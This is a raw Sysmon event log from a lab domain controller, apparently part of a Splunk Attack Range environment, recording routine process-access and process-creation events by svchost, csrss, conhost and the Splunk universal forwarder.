13:12:10.161{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-432A-6000-E300-000000009A01}5080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.161{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-432A-6000-E300-000000009A01}5080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.163{08A6967A-432A-6000-E300-000000009A01}5080C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-432A-6000-E200-000000009A01}4180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-432A-6000-E200-000000009A01}4180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.051{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-432A-6000-E200-000000009A01}4180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:10.053{08A6967A-432A-6000-E200-000000009A01}4180C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.163{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-432A-6000-E600-000000009A01}4216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.163{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-432A-6000-E600-000000009A01}4216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:11.147{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 